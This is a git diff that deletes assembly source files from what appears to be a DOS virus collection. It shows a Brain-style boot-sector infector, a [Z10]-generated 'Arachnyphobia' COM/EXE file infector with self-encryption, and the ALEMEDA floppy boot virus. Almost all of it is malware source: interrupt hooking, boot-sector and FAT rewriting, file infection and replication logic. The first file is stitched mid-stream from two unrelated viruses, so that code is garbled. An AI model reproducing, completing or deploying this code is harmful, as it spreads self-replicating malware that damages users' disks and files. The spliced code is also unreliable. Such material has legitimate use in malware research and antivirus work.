-entersecondpart: - mov cs:readcounter,1Fh - xor ax,ax - mov ds,ax ; ds -> interrupt table - mov ax,ds:[13h*4] - mov ds:[6Dh*4],ax - mov ax,ds:[13h*4+2] - mov ds:[6Dh*4+2],ax - mov ax,offset int13 ; 276h - mov ds:[13h*4],ax - mov ax,cs - mov ds:[13h*4+2],ax - mov cx,4 ; 4 tries - xor ax,ax - mov es,ax ; es -> interrupt table - -tryreadbootsector: - push cx - mov dh,cs:firsthead - mov dl,0 - mov cx,cs:firstsector - mov ax,201h ; read from default disk - mov bx,7C00h - int 6Dh ; int 13h - jnc readbootOK - mov ah,0 - int 6Dh ; int 13h - pop cx - loop tryreadbootsector - - int 18h ; ROM basic on failure -readbootOK: ; return control to - ; original boot sector -;* jmp far ptr 0000:7C00h - db 0EAh, 00h, 7Ch, 00h, 00h - nop ; MASM NOP!!! -int13: - sti - cmp ah,2 ; if not read request, - jne doint13 ; do not go further - cmp dl,2 ; if after second floppy, - ja doint13 ; do not go further - cmp ch,0 ; if not reading boot sector, - jne regularread ; go handle as usual - cmp dh,0 ; if boot sector, - je readboot ; do I<-/>/\|> stuff -regularread: - dec cs:readcounter ; Infect after 4 reads - jnz doint13 ; If counter still OK, don't - ; do anything else - jmp short readboot ; Otherwise, try to infect -doint13: - jmp exitint13h -readboot: -; FINISH THIS! - mov cs:int13flag,0 ; clear flag - mov cs:readcounter,4 ; reset counter - push ax - push bx - push cx - push dx - mov cs:curdrive,dl - mov cx,4 - -tryreadbootblock: - push cx - mov ah,0 ; Reset disk - int 6Dh - jc errorreadingbootblock ; Try again - mov dh,0 - mov cx,1 - mov bx,offset readbuffer ; buffer @ 6BEh - push es - mov ax,cs - mov es,ax - mov ax,201h - int 6Dh ; Read boot sector - pop es - jnc continuestuff ; continue if no error -errorreadingbootblock: - pop cx - loop tryreadbootblock - - jmp short resetdisk ; too many failures - nop -continuestuff: - pop cx ; get system id in boot block - mov ax,word ptr cs:[offset readbuffer+4] - cmp ax,1234h ; already infected? 
- jne dodisk ; if not, infect it - mov cs:int13flag,1 ; flag prev. infection - jmp short noreset -dodisk: - push ds - push es - mov ax,cs - mov ds,ax - mov es,ax - push si - call writevirus ; infect the disk - jc failme ; exit on failure - mov cs:int13flag,2 ; flag success - call changeroot ; manipulate volume label -failme: - pop si - pop es - pop ds - jnc noreset ; don't reset on success -resetdisk: - mov ah,0 ; reset disk - int 6Dh ; int 13h -noreset: - pop dx - pop cx - pop bx - pop ax - cmp cx,1 - jne exitint13h - cmp dh,0 - jne exitint13h - cmp cs:int13flag,1 ; already infected? - jne wasntinfected ; if wasn't, go elsewhere - mov cx,word ptr cs:[offset readbuffer+7] - mov dx,word ptr cs:[offset readbuffer+5] - mov dl,cs:curdrive ; otherwise, read real - jmp short exitint13h ; boot sector -wasntinfected: - cmp cs:int13flag,2 ; successful infection? - jne exitint13h ; if not, just do call - mov cx,cs:firstsector - mov dh,cs:firsthead -exitint13h: - int 6Dh ; int 13h - retf 2 - db 15 dup (0) - -FATManip: ; returns al as error code - jmp short delvedeeper - nop -FATManipreadcounter dw 3 - db ' (c) 1986 Brain & Amjads (pvt) Ltd' -delvedeeper: - call readFAT ; Get FAT ID byte - mov ax,word ptr ds:[offset readbuffer] - cmp ax,0FFFDh ; is it 360K disk? - je is360Kdisk ; continue if so - mov al,3 ; al=3 == not good disk - stc ; flag error - retn ; and exit -is360Kdisk: - mov cx,37h - mov FATManipreadcounter,0 ; none found yet -checknextsector: - call FATentry12bit ; get entry in FAT - cmp ax,0 ; unused? - jne notunused - inc FATManipreadcounter ; one more found unused - cmp FATManipreadcounter,3 ; If need more, - jne tryanother ; go there - jmp short markembad ; found 3 consecutive - nop ; empty sectors -notunused: - mov FATManipreadcounter,0 ; must start over -tryanother: - inc cx ; try next sector - cmp cx,163h ; end of disk? 
- jne checknextsector ; if not, continue - mov al,1 ; al=1 == none empty - stc ; Indicate error - retn -markembad: - mov dl,3 ; 3 times -markanotherbad: - call markbad12bit - dec cx - dec dl - jnz markanotherbad - inc cx - call calc1sttrack - call writeFAT ; update FAT - mov al,0 ; al=0 == ok - clc ; indicate success - retn - -markbad12bit: - push cx - push dx - mov si,offset readbuffer ; si -> buffer - mov al,cl - shr al,1 - jc low_12 ; low bits - call clus2offset12bit - mov ax,[bx+si] ; get FAT entry - and ax,0F000h ; mark it bad - or ax,0FF7h - jmp short putitback ; and put it back - nop -low_12: - call clus2offset12bit - mov ax,[bx+si] ; get FAT entry - and ax,0Fh ; mark it bad - or ax,0FF70h -putitback: - mov [bx+si],ax ; replace FAT entry - mov word ptr ds:[400h][bx+si],ax ; in two places - pop dx - pop cx - retn - -FATentry12bit: - push cx - mov si,offset readbuffer ; si->buffer - mov al,cl - shr al,1 -; Part 3 of the virus starts here - jc want_high_12 - call clus2offset12bit - mov ax,[bx+si] - and ax,0FFFh - jmp short exitFATentry12bit - nop -want_high_12: - call clus2offset12bit ; xxxxxxxxxxxx0000 - mov ax,[bx+si] ; ^^^^^^^^^^^^wanted - and ax,0FFF0h ; mask wanted bits - mov cl,4 ; and move to correct - shr ax,cl ; position -exitFATentry12bit: - pop cx - retn - -clus2offset12bit: - push dx - mov ax,3 - mul cx - shr ax,1 ; ax = cx*1.5 - mov bx,ax - pop dx - retn - -readFAT: - mov ah,2 ; read - call FAT_IO - retn - -writeFAT: - mov ah,3 ; write - call FAT_IO - retn - -FAT_IO: - mov cx,4 ; try four times -FAT_IOLoop: - push cx - push ax - mov ah,0 ; reset disk - int 6Dh ; int 13h - pop ax - jc tryFAT_IOagain - mov bx,offset readbuffer - mov al,4 ; 4 sectors - mov dh,0 ; head 0 - mov dl,curdrive - mov cx,2 ; sector 2 - push ax ; (FAT) - int 6Dh ; int 13h - pop ax - jnc exitFAT_IO -tryFAT_IOagain: - pop cx - loop FAT_IOLoop - - pop ax - pop ax - mov al,2 - stc ; mark error - retn -exitFAT_IO: - pop cx - retn - -calc1sttrack: - push cx - sub cx,2 - shl cx,1 ; 2 
sectors/cluster - add cx,0Ch ; start of data area - mov ax,cx ; ax = sector - mov cl,12h ; 4096 - div cl ; ax/4096 = al rem ah - mov byte ptr firstsector+1,al - mov firsthead,0 - inc ah - cmp ah,9 ; past track 9? - jbe notpasttrack9 ; nope, we are ok - sub ah,9 ; otherwise, adjust - mov firsthead,1 -notpasttrack9: - mov byte ptr firstsector,ah - pop cx - retn - - db 0, 0, 0, 0, 0, 0 -r_or_w_root db 3 -entrycount dw 35h - -tempsave1 dw 303h -tempsave2 dw 0EBEh -tempsave3 dw 1 -tempsave4 dw 100h - db 0E0h,0D8h, 9Dh,0D7h,0E0h, 9Fh - db 8Dh, 98h, 9Fh, 8Eh,0E0h - db ' (c) ashar $' -changeroot: - call readroot ; read in root directory - jc donotchangeroot - push di - call changevolume ; change volume label - pop di - jc donotchangeroot - call writeroot ; write back new root dir -donotchangeroot: - retn -; The following is just garbage bytes - db 0BBh, 9Bh, 04h,0B9h, 0Bh - db 0,8Ah,7,0F6h,0D8h,88h,4,46h,43h - db 0E2h,0F6h,0B0h,8,88h,4,0F8h,0C3h - db 0C6h, 06h - -changevolume: - mov entrycount,6Ch - mov si,offset readbuffer+40h; 3nd dir entry - mov tempsave1,dx - mov ax,entrycount ; 6Ch - shr ax,1 - mov tempsave3,ax ; 36h - shr ax,1 - mov tempsave2,ax ; 1Bh - xchg ax,cx - and cl,43h ; cx = 3 - mov di,tempsave2 - add di,1E3h ; di = 01FE -findlabel: - mov al,[si] - cmp al,0 - je dolabel ; no mo entries - mov al,[si+0Bh] ; attribute byte - and al,8 ; volume label? - cmp al,8 ; yes? - je dolabel ; then change it! - add si,20h ; go to next directory entry - dec entrycount - jnz findlabel ; loop back - stc ; Error! 
- retn - db 8Bh -dolabel: - mov bx,[di] ; offset a_data - xor bx,tempsave3 ; bx = 53Ah - mov tempsave3,si ; si->direntry - cli - mov ax,ss - mov tempsave1,ax - mov tempsave2,sp - mov ax,cs - mov ss,ax - mov sp,tempsave3 - add sp,0Ch ;->reserved area - mov cl,51h - add dx,444Ch - mov di,2555h - mov cx,0C03h - repe cmpsw - mov ax,0B46h - mov cx,3 - rol ax,cl ; ax = 5A30h - mov tempsave3,ax - mov cx,5 - mov dx,8 - sub tempsave3,5210h ; 820h - push tempsave3 ; store attributes/reserved -; I haven't commented the remainder of this procedure. -; It basically changes the volume label to read "(c) Brain" - -; Comment mode OFF - -dowhatever: - mov ah,[bx] ; 5a3h - inc bx - mov dl,ah - shl dl,1 - jc dowhatever -searchstuff: - mov dl,[bx] ; dl=C2h - inc bx ; bx=53Eh - mov al,dl - shl dl,1 - jc searchstuff - add ax,1D1Dh - push ax - inc tempsave3 - db 73h, 01h ; jnc $+3 - db 0EAh,0E2h,0E1h, 8Bh, 26h; jmp 268B:E1E2 - xchg bp,ax - add al,0A1h - xchg bx,ax - add al,8Eh - sar bl,1 - add dh,[bp+si] - clc - ret - ;db 95h, 04h,0A1h, 93h, 04h, 8Eh - ;db 0D0h,0FBh, 02h, 32h,0F8h,0C3h - -; Comment mode ON - -readroot: - mov r_or_w_root,2 ; set action code - jmp short do_rw_root ; easier to do w/ - nop ; mov ah, 2 -writeroot: - mov r_or_w_root,3 - jmp short do_rw_root ; this is somewhat useless - nop -do_rw_root: - mov dh,0 ; head 0 - mov dl,curdrive - mov cx,6 ; sector 6 - mov ah,r_or_w_root - mov al,4 ; 4 sectors - mov bx,offset readbuffer - call doint13h - jc exit_rw_root ; quit on error - mov cx,1 - mov dh,1 ; head 1 - mov ah,r_or_w_root - mov al,3 - add bx,800h - call doint13h - -exit_rw_root: - retn - -doint13h: - mov tempsave1,ax - mov tempsave2,bx - mov tempsave3,cx - mov tempsave4,dx - mov cx,4 - -doint13hloop: - push cx - mov ah,0 ; Reset disk - int 6Dh - jc errordoingint13h - mov ax,tempsave1 - mov bx,tempsave2 - mov cx,tempsave3 - mov dx,tempsave4 - int 6Dh ; int 13h - jnc int13hsuccess -errordoingint13h: - pop cx - loop doint13hloop - - stc ; indicate error - retn 
-int13hsuccess: - pop cx - retn - - db 0, 0, 0 -; Part 4 of the virus starts here -tempstorecx dw 3 -readwritecurrentdata dw 301h - -writevirus: - call FATManip - jc exitwritevirus - mov cursector,1 - mov curhead,0 - mov bx,offset readbuffer - call readcurrent - mov bx,offset readbuffer - mov ax,firstsector - mov cursector,ax - mov ah,firsthead - mov curhead,ah - call writecurrent - call calcnextsector - mov cx,5 - mov bx,200h -writeanothersector: - mov tempstorecx,cx - call writecurrent - call calcnextsector - add bx,200h - mov cx,tempstorecx - loop writeanothersector - - mov curhead,0 - mov cursector,1 - mov bx,0 - call writecurrent - clc ; indicate success -exitwritevirus: - retn - - -readcurrent: - mov readwritecurrentdata,201h - jmp short doreadwrite - nop -writecurrent: - mov readwritecurrentdata,301h - jmp short doreadwrite ; This is pointless. - nop -doreadwrite: - push bx - mov cx,4 - -tryreadwriteagain: - push cx - mov dh,curhead - mov dl,curdrive - mov cx,cursector - mov ax,readwritecurrentdata ; read or write? - int 6Dh ; int 13h - jnc readwritesuccessful - mov ah,0 ; reset disk - int 6Dh ; int 13h - pop cx - loop tryreadwriteagain - - pop bx - pop bx - stc ; Indicate error - retn -readwritesuccessful: - pop cx - pop bx - retn - - -calcnextsector: - inc byte ptr cursector ; next sector - cmp byte ptr cursector,0Ah - jne donecalculate ; finished calculations - mov byte ptr cursector,1 ; clear sector # - inc curhead ; and go to next head - cmp curhead,2 ; if not too large, - jne donecalculate ; we are done - mov curhead,0 ; otherwise clear head # - inc byte ptr cursector+1 ; and advance cylinder -donecalculate: - retn - - db 64h, 74h, 61h - -; read buffer starts here -; insert your favorite boot block below... 
-readbuffer: - jmp exit_virus - -creator db '[Z10]',0 ; Mass Produced Code Generator -virusname db '[Arachnyphobia]',0 -author db 'Abraxas',0 - -infect_mask: - mov ah,4eh ; find first file - mov cx,7 ; any attribute -findfirstnext: - int 21h ; DS:DX points to mask - jc exit_infect_mask ; No mo files found - - mov al,0h ; Open read only - call open - - mov ah,3fh ; Read file to buffer - lea dx,[bp+buffer] ; @ DS:DX - mov cx,1Ah ; 1Ah bytes - int 21h - - mov ah,3eh ; Close file - int 21h - - cmp word ptr [bp+buffer],'ZM'; EXE? - jz checkEXE ; Why yes, yes it is! -checkCOM: - mov ax,word ptr [bp+newDTA+35] ; Get tail of filename - cmp ax,'DN' ; Ends in ND? (commaND) - jz find_next - - mov ax,word ptr [bp+newDTA+1Ah] ; Filesize in DTA - cmp ax,12000 ; Is it too small? - jb find_next - - cmp ax,65535-(endheap-decrypt) ; Is it too large? - ja find_next - - mov bx,word ptr [bp+buffer+1]; get jmp location - add bx,heap-decrypt+3 ; Adjust for virus size - cmp ax,bx - je find_next ; already infected - jmp infect_com -checkEXE: cmp word ptr [bp+buffer+10h],id ; is it already infected? 
- jnz infect_exe -find_next: - mov ah,4fh ; find next file - jmp short findfirstnext -exit_infect_mask: ret - -infect_exe: - les ax, dword ptr [bp+buffer+14h] ; Save old entry point - mov word ptr [bp+jmpsave2], ax - mov word ptr [bp+jmpsave2+2], es - - les ax, dword ptr [bp+buffer+0Eh] ; Save old stack - mov word ptr [bp+stacksave2], es - mov word ptr [bp+stacksave2+2], ax - - mov ax, word ptr [bp+buffer + 8] ; Get header size - mov cl, 4 ; convert to bytes - shl ax, cl - xchg ax, bx - - les ax, [bp+offset newDTA+26]; Get file size - mov dx, es ; to DX:AX - push ax - push dx - - sub ax, bx ; Subtract header size from - sbb dx, 0 ; file size - - mov cx, 10h ; Convert to segment:offset - div cx ; form - - mov word ptr [bp+buffer+14h], dx ; New entry point - mov word ptr [bp+buffer+16h], ax - - mov word ptr [bp+buffer+0Eh], ax ; and stack - mov word ptr [bp+buffer+10h], id - - pop dx ; get file length - pop ax - - add ax, heap-decrypt ; add virus size - adc dx, 0 - - mov cl, 9 - push ax - shr ax, cl - ror dx, cl - stc - adc dx, ax - pop ax - and ah, 1 ; mod 512 - - mov word ptr [bp+buffer+4], dx ; new file size - mov word ptr [bp+buffer+2], ax - - push cs ; restore ES - pop es - - push word ptr [bp+buffer+14h] ; needed later - mov cx, 1ah - jmp short finishinfection -infect_com: ; ax = filesize - mov cx,3 - sub ax,cx - lea si,[bp+offset buffer] - lea di,[bp+offset save3] - movsw - movsb - mov byte ptr [si-3],0e9h - mov word ptr [si-2],ax - add ax,103h - push ax ; needed later -finishinfection: - push cx ; Save # bytes to write - xor cx,cx ; Clear attributes - call attributes ; Set file attributes - - mov al,2 - call open - - mov ah,40h ; Write to file - lea dx,[bp+buffer] ; Write from buffer - pop cx ; cx bytes - int 21h - - mov ax,4202h ; Move file pointer - xor cx,cx ; to end of file - cwd ; xor dx,dx - int 21h - -get_encrypt_value: - mov ah,2ch ; Get current time - int 21h ; dh=sec,dl=1/100 sec - or dx,dx ; Check if encryption value = 0 - jz get_encrypt_value ; 
Get another if it is - mov [bp+decrypt_value],dx ; Set new encryption value - lea di,[bp+code_store] - mov ax,5355h ; push bp,push bx - stosw - lea si,[bp+decrypt] ; Copy encryption function - mov cx,startencrypt-decrypt ; Bytes to move - push si ; Save for later use - push cx - rep movsb - - xor byte ptr [bp+decrypt_loop+2],028h ; flip between add/sub - - lea si,[bp+write] ; Copy writing function - mov cx,endwrite-write ; Bytes to move - rep movsb - pop cx - pop si - pop dx ; Entry point of virus - push di - push si - push cx - rep movsb ; Copy decryption function - mov ax,5b5dh ; pop bx,pop bp - stosw - mov al,0c3h ; retn - stosb - - add dx,offset startencrypt - offset decrypt ; Calculate new - mov word ptr [bp+patch_startencrypt+1],dx ; starting offset of - call code_store ; decryption - pop cx - pop di - pop si - rep movsb ; Restore decryption function - - mov ax,5701h ; Restore creation date/time - mov cx,word ptr [bp+newDTA+16h] ; time - mov dx,word ptr [bp+newDTA+18h] ; date - int 21h - - mov ah,3eh ; Close file - int 21h - - mov ch,0 - mov cl,byte ptr [bp+newDTA+15h] ; Restore original - call attributes ; attributes - - dec byte ptr [bp+numinfec] ; One mo infection - jnz mo_infections ; Not enough - pop ax ; remove call from stack - jmp done_infections -mo_infections: jmp find_next - -open: - mov ah,3dh - lea dx,[bp+newDTA+30] ; filename in DTA - int 21h - xchg ax,bx - ret - -attributes: - mov ax,4301h ; Set attributes to cx - lea dx,[bp+newDTA+30] ; filename in DTA - int 21h - ret - -write: - pop bx ; Restore file handle - pop bp ; Restore relativeness - mov ah,40h ; Write to file - lea dx,[bp+decrypt] ; Concatenate virus - mov cx,heap-decrypt ; # bytes to write - int 21h - push bx - push bp -endwrite: - -int24: ; New int 24h (error) handler - mov al,3 ; Fail call - iret ; Return control - -exe_mask db '*.exe',0 -com_mask db '*.com',0 -dot_dot db '..',0 -heap: ; Variables not in code -; The following code is the buffer for the write function -code_store: 
db (startencrypt-decrypt)*2+(endwrite-write)+1 dup (?) -oldint24 dd ? ; Storage for old int 24h handler -backslash db ? -origdir db 64 dup (?) ; Current directory buffer -newDTA db 43 dup (?) ; Temporary DTA -numinfec db ? ; Infections this run -buffer db 1ah dup (?) ; read buffer -endheap: ; End of virus -end entry_point diff --git a/a/ALEMEDA (19).ASM b/a/ALEMEDA (19).ASM deleted file mode 100755 index 287ade7..0000000 --- a/a/ALEMEDA (19).ASM +++ /dev/null 
@@ -1,381 +0,0 @@ -;-----------------------------------------------------------------------; -; This virus is of the "FLOPPY ONLY" variety. ; -; It replicates to the boot sector of a floppy disk and when it gains control -; it will move itself to upper memory. It redirects the keyboard ; -; interrupt (INT 09H) to look for ALT-CTRL-DEL sequences at which time ; -; it will attempt to infect any floppy it finds in drive A:. ; -; It keeps the real boot sector at track 39, sector 8, head 0 ; -; It does not map this sector bad in the fat (unlike the Pakistani Brain) -; and should that area be used by a file, the virus ; -; will die. It also contains no anti detection mechanisms as does the ; -; BRAIN virus. It apparently uses head 0, sector 8 and not head 1 ; -; sector 9 because this is common to all floppy formats both single ; -; sided and double sided. It does not contain any malevolent TROJAN ; -; HORSE code. It does appear to contain a count of how many times it ; -; has infected other diskettes although this is harmless and the count ; -; is never accessed. ; -; ; -; Things to note about this virus: ; -; It can not only live through an ALT-CTRL-DEL reboot command, but this ; -; is its primary (only for that matter) means of reproduction to other ; -; floppy diskettes. The only way to remove it from an infected system ; -; is to turn the machine off and reboot an uninfected copy of DOS. ; -; It is even resident when no floppy is booted but BASIC is loaded ; -; instead. Then when ALT-CTRL-DEL is pressed from inside of BASIC, ; -; it activates and infectes the floppy from which the user is ; -; attempting to boot. ; -; ; -; Also note that because of the POP CS command to pass control to ; -; its self in upper memory, this virus does not to work on 80286 ; -; machines (because this is not a valid 80286 instruction). 
; -; ; -; The Norton Utilities can be used to identify infected diskettes by ; -; looking at the boot sector and the DOS SYS utility can be used to ; -; remove it (unlike the Pakistani Brain). ; -;-----------------------------------------------------------------------; - ; - ORG 7C00H ; - ; -TOS LABEL WORD ;TOP OF STACK -;-----------------------------------------------------------------------; -; 1. Find top of memory and copy ourself up there. (keeping same offset); -; 2. Save a copy of the first 32 interrupt vectors to top of memory too ; -; 3. Redirect int 9 (keyboard) to ourself in top of memory ; -; 4. Jump to ourself at top of memory ; -; 5. Load and execute REAL boot sector from track 40, head 0, sector 8 ; -;-----------------------------------------------------------------------; -BEGIN: CLI ;INITIALIZE STACK - XOR AX,AX ; - MOV SS,AX ; - MOV SP,offset TOS ; - STI ; - ; - MOV BX,0040H ;ES = TOP OF MEMORY - (7C00H+512) - MOV DS,BX ; - MOV AX,[0013H] ; - MUL BX ; - SUB AX,07E0H ; (7C00H+512)/16 - MOV ES,AX ; - ; - PUSH CS ;DS = CS - POP DS ; - ; - CMP DI,3456H ;IF THE VIRUS IS REBOOTING... - JNE B_10 ; - DEC Word Ptr [COUNTER_1] ;...LOW&HI:COUNTER_1-- - ; -B_10: MOV SI,SP ;SP=7C00 ;COPY SELF TO TOP OF MEMORY - MOV DI,SI ; - MOV CX,512 ; - CLD ; - REP MOVSB ; - ; - MOV SI,CX ;CX=0 ;SAVE FIRST 32 INT VETOR ADDRESSES TO - MOV DI,offset BEGIN - 128 ; 128 BYTES BELOW OUR HI CODE - MOV CX,128 ; - REP MOVSB ; - ; - CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD) - ; - PUSH ES ;ES=HI ; JUMP TO OUR HI CODE WITH - NOP - ; - PUSH DS ;DS=0 ; ES = DS - POP ES ; - ; - MOV BX,SP ; SP=7C00 ;LOAD REAL BOOT SECTOR TO 0000:7C00 - MOV DX,CX ;CX=0 ;DRIVE A: HEAD 0 - MOV CX,2708H ; TRACK 40, SECTOR 8 - MOV AX,0201H ; READ SECTOR - INT 13H ; (common to 8/9 sect. 1/2 sided!) 
- JB $ ; HANG IF ERROR - ; - JMP JMP_BOOT ;JMP 0000:7C00 - ; -;-----------------------------------------------------------------------; -; SAVE THEN REDIRECT INT 9 VECTOR ; -; ; -; ON ENTRY: DS = 0 ; -; ES = WHERE TO SAVE OLD_09 & (HI) ; -; WHERE NEW_09 IS (HI) ; -;-----------------------------------------------------------------------; -PUT_NEW_09: ; - DEC Word Ptr [0413H] ;TOP OF MEMORY (0040:0013) -= 1024 - ; - MOV SI,9*4 ;COPY INT 9 VECTOR TO - MOV DI,offset OLD_09 ; OLD_09 (IN OUR HI CODE!) - MOV CX,0004 ; - ; - CLI ; - REP MOVSB ; - MOV Word Ptr [9*4],offset NEW_09 - MOV [(9*4)+2],ES ; - STI ; - ; - RET ; - ; -;-----------------------------------------------------------------------; -; RESET KEYBOARD, TO ACKNOWLEDGE LAST CHAR ; -;-----------------------------------------------------------------------; -ACK_KEYBD: ; - IN AL,61H ;RESET KEYBOARD THEN CONTINUE - MOV AH,AL ; - OR AL,80H ; - OUT 61H,AL ; - XCHG AL,AH ; - OUT 61H,AL ; - JMP RBOOT ; - ; -;-----------------------------------------------------------------------; -; DATA AREA WHICH IS NOT USED IN THIS VERSION ; -; REASON UNKNOWN ; -;-----------------------------------------------------------------------; -TABLE DB 27H,0,1,2 ;FORMAT INFORMATION FOR TRACK 39 - DB 27H,0,2,2 ; (CURRENTLY NOT USED) - DB 27H,0,3,2 ; - DB 27H,0,4,2 ; - DB 27H,0,5,2 ; - DB 27H,0,6,2 ; - DB 27H,0,7,2 ; - DB 27H,0,8,2 ; - ; -;A7C9A LABEL BYTE ; - DW 00024H ;NOT USED - DB 0ADH ; - DB 07CH ; - DB 0A3H ; - DW 00026H ; - ; -;L7CA1: ; - POP CX ;NOT USED - POP DI ; - POP SI ; - POP ES ; - POP DS ; - POP AX ; - POPF ; - JMP 1111:1111 ; - ; -;-----------------------------------------------------------------------; -; IF ALT & CTRL & DEL THEN ... ; -; IF ALT & CTRL & ? THEN ... 
; -;-----------------------------------------------------------------------; -NEW_09: PUSHF ; - STI ; - ; - PUSH AX ; - PUSH BX ; - PUSH DS ; - ; - PUSH CS ;DS=CS - POP DS ; - ; - MOV BX,[ALT_CTRL W] ;BX=SCAN CODE LAST TIME - IN AL,60H ;GET SCAN CODE - MOV AH,AL ;SAVE IN AH - AND AX,887FH ;STRIP 8th BIT IN AL, KEEP 8th BIT AH - ; - CMP AL,1DH ;IS IT A [CTRL]... - JNE N09_10 ;...JUMP IF NO - MOV BL,AH ;(BL=08 ON KEY DOWN, BL=88 ON KEY UP) - JMP N09_30 ; - ; -N09_10: CMP AL,38H ;IS IT AN [ALT]... - JNE N09_20 ;...JUMP IF NO - MOV BH,AH ;(BH=08 ON KEY DOWN, BH=88 ON KEY UP) - JMP N09_30 ; - ; -N09_20: CMP BX,0808H ;IF (CTRL DOWN & ALT DOWN)... - JNE N09_30 ;...JUMP IF NO - ; - CMP AL,17H ;IF [I]... - JE N09_X0 ;...JUMP IF YES - CMP AL,53H ;IF [DEL]... - JE ACK_KEYBD ;...JUMP IF YES - ; -N09_30: MOV [ALT_CTRL],BX ;SAVE SCAN CODE FOR NEXT TIME - ; -N09_90: POP DS ; - POP BX ; - POP AX ; - POPF ; - ; - DB 0EAH ;JMP F000:E987 -OLD_09 DW ? ; - DW 0F000H ; - ; -N09_X0: JMP N09_X1 ; - ; -;-----------------------------------------------------------------------; -; ; -;-----------------------------------------------------------------------; -RBOOT: MOV DX,03D8H ;DISABLE COLOR VIDEO !?!? - MOV AX,0800H ;AL=0, AH=DELAY ARG - OUT DX,AL ; - CALL DELAY ; - MOV [ALT_CTRL],AX ;AX=0 ; - ; - MOV AL,3 ;AH=0 ;SELECT 80x25 COLOR - INT 10H ; - MOV AH,2 ;SET CURSOR POS 0,0 - XOR DX,DX ; - MOV BH,DH ; PAGE 0 - INT 10H ; - ; - MOV AH,1 ;SET CURSOR TYPE - MOV CX,0607H ; - INT 10H ; - ; - MOV AX,0420H ;DELAY (AL=20H FOR EOI BELOW) - CALL DELAY ; - ; - CLI ; - OUT 20H,AL ;SEND EOI TO INT CONTROLLER - ; - MOV ES,CX ;CX=0 (DELAY) ;RESTORE FIRST 32 INT VECTORS - MOV DI,CX ; (REMOVING OUR INT 09 HANDLER!) 
- MOV SI,offset BEGIN - 128 ; - MOV CX,128 ; - CLD ; - REP MOVSB ; - ; - MOV DS,CX ;CX=0 ;DS=0 - ; - MOV Word Ptr [19H*4],offset NEW_19 ;SET INT 19 VECTOR - MOV [(19H*4)+2],CS ; - ; - MOV AX,0040H ;DS = ROM DATA AREA - MOV DS,AX ; - ; - MOV [0017H],AH ;AH=0 ;KBFLAG (SHIFT STATES) = 0 - INC Word Ptr [0013H] ;MEMORY SIZE += 1024 (WERE NOT ACTIVE) - ; - PUSH DS ;IF BIOS F000:E502 == 21E4... - MOV AX,0F000H ; - MOV DS,AX ; - CMP Word Ptr [0E502H],21E4H ; - POP DS ; - JE R_90 ; - INT 19H ; IF NOT...REBOOT - ; -R_90: JMP 0F000:0E502H ;...DO IT ?!?!?! - ; -;-----------------------------------------------------------------------; -; REBOOT INT VECTOR ; -;-----------------------------------------------------------------------; -NEW_19: XOR AX,AX ; - ; - MOV DS,AX ;DS=0 - MOV AX,[0410] ;AX=EQUIP FLAG - TEST AL,1 ;IF FLOPPY DRIVES ... - JNZ N19_20 ;...JUMP -N19_10: PUSH CS ;ELSE ES=CS - POP ES ; - CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD) - INT 18H ;LOAD BASIC - ; -N19_20: MOV CX,0004 ;RETRY COUNT = 4 - ; -N19_22: PUSH CX ; - MOV AH,00 ;RESET DISK - INT 13 ; - JB N19_81 ; - MOV AX,0201 ;READ BOOT SECTOR - PUSH DS ; - POP ES ; - MOV BX,offset BEGIN ; - MOV CX,1 ;TRACK 0, SECTOR 1 - INT 13H ; -N19_81: POP CX ; - JNB N19_90 ; - LOOP N19_22 ; - JMP N19_10 ;IF RETRY EXPIRED...LOAD BASIC - ; -;-----------------------------------------------------------------------; -; Reinfection segment. ; -;-----------------------------------------------------------------------; -N19_90: CMP DI,3456 ;IF NOT FLAG SET... - JNZ RE_INFECT ;...RE INFECT - ; -JMP_BOOT: ;PASS CONTROL TO BOOT SECTOR - JMP 0000:7C00H ; - ; -;-----------------------------------------------------------------------; -; Reinfection Segment. ; -;-----------------------------------------------------------------------; -RE_INFECT: ; - MOV SI,offset BEGIN ;COMPARE BOOT SECTOR JUST LOADED WITH - MOV CX,00E6H ; OURSELF - MOV DI,SI ; - PUSH CS ; - POP ES ; - CLD ; - REPE CMPSB ; - JE RI_12 ;IF NOT EQUAL... 
- ; - INC Word Ptr ES:[COUNTER_1] ;INC. COUNTER IN OUR CODE (NOT DS!) - ; -;MAKE SURE TRACK 39, HEAD 0 FORMATTED ; - MOV BX,offset TABLE ;FORMAT INFO - MOV DX,0000 ;DRIVE A: HEAD 0 - MOV CH,40-1 ;TRACK 39 - MOV AH,5 ;FORMAT - JMP RI_10 ;REMOVE THE FORMAT OPTION FOR NOW ! - ; -; <<< NO EXECUTION PATH TO HERE >>> ; - JB RI_80 ; - ; -;WRITE REAL BOOT SECTOR AT TRACK 39, SECTOR 8, HEAD 0 -RI_10: MOV ES,DX ;ES:BX = 0000:7C00, HEAD=0 - MOV BX,offset BEGIN ;TRACK 40H - MOV CL,8 ;SECTOR 8 - MOV AX,0301H ;WRITE 1 SECTOR - INT 13H ; - ; - PUSH CS ; (ES=CS FOR PUT_NEW_09 BELOW) - POP ES ; - JB RI_80 ;IF WRITE ERROR...JUMP TO BOOT CODE - ; - MOV CX,0001 ;WRITE INFECTED BOOT SECTOR ! - MOV AX,0301 ; - INT 13H ; - JB RI_80 ; IF ERROR...JUMP TO BOOT CODE - ; -RI_12: MOV DI,3456H ;SET "JUST INFECTED ANOTHER ONE"... - INT 19H ;...FLAG AND REBOOT - ; -RI_80: CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD) - DEC Word Ptr ES:[COUNTER_1] ; (DEC. CAUSE DIDNT INFECT) - JMP JMP_BOOT ; - ; -;-----------------------------------------------------------------------; -; ; -;-----------------------------------------------------------------------; -N09_X1: MOV [ALT_CTRL],BX ;SAVE ALT & CTRL STATUS - ; - MOV AX,[COUNTER_1] ;PUT COUNTER_1 INTO RESET FLAG - MOV BX,0040H ; - MOV DS,BX ; - MOV [0072H],AX ; 0040:0072 = RESET FLAG - JMP N09_90 ; - ; -;-----------------------------------------------------------------------; -; DELAY ; -; ; -; ON ENTRY AH:CX = LOOP COUNT ; -;-----------------------------------------------------------------------; -DELAY: SUB CX,CX ; -D_01: LOOP $ ; - SUB AH,1 ; - JNZ D_01 ; - RET ; - ; -;-----------------------------------------------------------------------; -; ; -;-----------------------------------------------------------------------; -A7DF4 DB 27H,00H,8,2 - -COUNTER_1 DW 001CH -ALT_CTRL DW 0 -A7DFC DB 27H,0,8,2 - \ No newline at end of file diff --git a/a/AMBUL3 (20).ASM b/a/AMBUL3 